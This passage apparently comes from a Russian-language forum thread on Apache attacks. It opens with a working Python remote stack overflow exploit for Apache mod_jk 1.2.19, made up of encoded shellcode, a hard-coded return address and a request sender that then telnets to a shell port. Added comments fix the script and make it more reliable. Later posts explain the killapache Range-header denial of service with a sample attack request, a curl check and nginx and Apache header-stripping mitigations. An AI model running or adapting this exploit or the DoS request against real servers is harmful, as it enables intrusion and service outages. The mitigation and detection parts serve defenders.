shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68"

# Layout of the overflowing request path (4091 bytes in total, independent of
# the shellcode length, from the arithmetic below):
#   8 NOPs | shellcode | NOP filler | ret (4 bytes) | 11-byte stub | 77 NOPs
# The constants are the author's values for the two Win32 builds listed in the
# header; nothing on this page explains how they were derived.
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
# Hard-coded little-endian 32-bit address 0x77d92acc, presumably a gadget in a
# Windows system DLL of the tested builds — it will not match other builds or a
# relocated DLL. TODO confirm before reuse.
ret = "\xcc\x2a\xd9\x77"
# NOTE(review): if a longer shellcode is substituted the NOP count goes negative
# and silently becomes "", shifting ret; keep
# len(shellcode) <= buf_base - foo_base - buf_offset.
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
# The stub after ret appears to decode as: nop; nop; mov al,0x53;
# imul eax,eax,0x28; add ebx,eax; call ebx — i.e. it adjusts ebx and calls
# through it, presumably landing back in the shellcode. The register state it
# relies on at that point is not visible here.
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)

def usage():
  """Write the one-line usage text (plus a blank line) to stdout and exit with status -1."""
  sys.stdout.write('usage: %s\n\n' % sys.argv[0])
  sys.exit(-1)

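def xpl():
  """Send the overflow request to port 80 of the module-global `host`, wait
  three seconds, then attach a telnet client to port 8888, where the payload
  is expected to listen (implied only by the telnet call; not stated on the
  page). Python 2 semantics: `buf` is a byte string.

  Fixes against the original: the request literal was unterminated
  (`\\r\\n\\r\\n\\'`, a syntax error as posted); send() is replaced by
  sendall() so a short write of the ~4 KB buffer is not silently dropped; the
  bare `except:` no longer hides the failure reason (or a Ctrl-C); and telnet
  is spawned with an argv list instead of os.system(), which let shell
  metacharacters in the hostname argument run commands locally.
  """
  import subprocess
  # NOTE: as in the original there is no space between the padding and
  # "HTTP/1.0", so Apache most likely parses this as a one-token HTTP/0.9
  # request; kept as-is because the overflow is in the URI, not the headers.
  request = 'GET /' + buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n' % host
  print(len(buf))
  s = socket(AF_INET, SOCK_STREAM)
  try:
    s.connect((host, 80))
    s.sendall(request)
  except Exception as e:
    print('  [-] EXPLOIT FAILED!\n')
    print('      %s' % e)
    return
  finally:
    s.close()
  print('  [+] connecting to %s ...\n' % host)
  time.sleep(3)
  subprocess.call(['telnet', host, '8888'])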

if __name__ == '__main__':
  # Banner, then the single positional argument (target host). `host` is a
  # module global read by xpl().
  print('Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n')
  if len(sys.argv) < 2:
    usage()
  host = sys.argv[1]
  xpl()


# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#


#4
###

Apache mod_dav / svn Remote Denial of Service Exploit



#5
###


Как завалить Apache?


Появился занятный скрипт под названием killapache.pl.

Как он работает и что делает:
Скрипт запускает в несколько потоков запрос
HEAD / HTTP/1.1
Host: www.example.com
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300
Accept-Encoding: gzip
Connection: close
Apache на каждый перечисленный диапазон создаёт в памяти отдельный фрагмент ответа; при сотнях перекрывающихся диапазонов в одном запросе (как в примере выше: 0-, 5-0, 5-1 … 5-1300) ответ на один запрос раздувается до многих копий файла, а несколько параллельных потоков таких запросов исчерпывают память и процессор сервера — это и есть DoS.

На момент написания поста официального исправления ещё не было; ожидался патч или новая версия.

Существует два обходных пути:
  • поставить перед Apache nginx (или другой reverse proxy) и не пропускать заголовки Range/Request-Range к Apache;
  • удалить эти заголовки прямо в Apache средствами mod_headers (RequestHeader unset, см. ниже).
Оба варианта целиком отключают частичные (byte-range) запросы — докачку файлов, перемотку медиа, — поэтому это временная мера до выхода исправления.



#6
$iD

Хабр говорит о еще одной беде с apache :)

Уязвимости также подвержен устаревший заголовок Request-Range времён MSIE 3, так что фильтровать один только Range недостаточно. Проверить, уязвим ли ваш сервер к этому варианту атаки, можно так:

curl -I -H "Request-Range: bytes=0-1,0-2,0-3,0-4,0-5,0-6" -s www.example.com/robots.txt | grep Partial

Если на такой запрос отвечает Apache и вы видите 206 Partial Content, значит сервер принимает многодиапазонные Request-Range и, скорее всего, уязвим. Проверяйте именно таким curl-запросом, а не самим killapache.pl — тот действительно кладёт сервер.

Решение для nginx

Запретить nginx проксировать опасные заголовки можно директивами:
# Clear both range headers before the request is forwarded to Apache.
# Side effect: byte-range requests (resumable downloads, media seeking) no
# longer work through this proxy — a stop-gap until Apache itself is fixed.
proxy_set_header Range "";
proxy_set_header Request-Range "";
Решение для Apache
Заблокировать проблемные заголовки можно при помощи mod_headers:
# a2enmod headers
# Drop both headers from every request before they reach the range handling.
# Same side effect as the nginx variant: all byte-range (partial content)
# requests are disabled server-wide; remove once a patched Apache is deployed.
RequestHeader unset Range
RequestHeader unset Request-Range


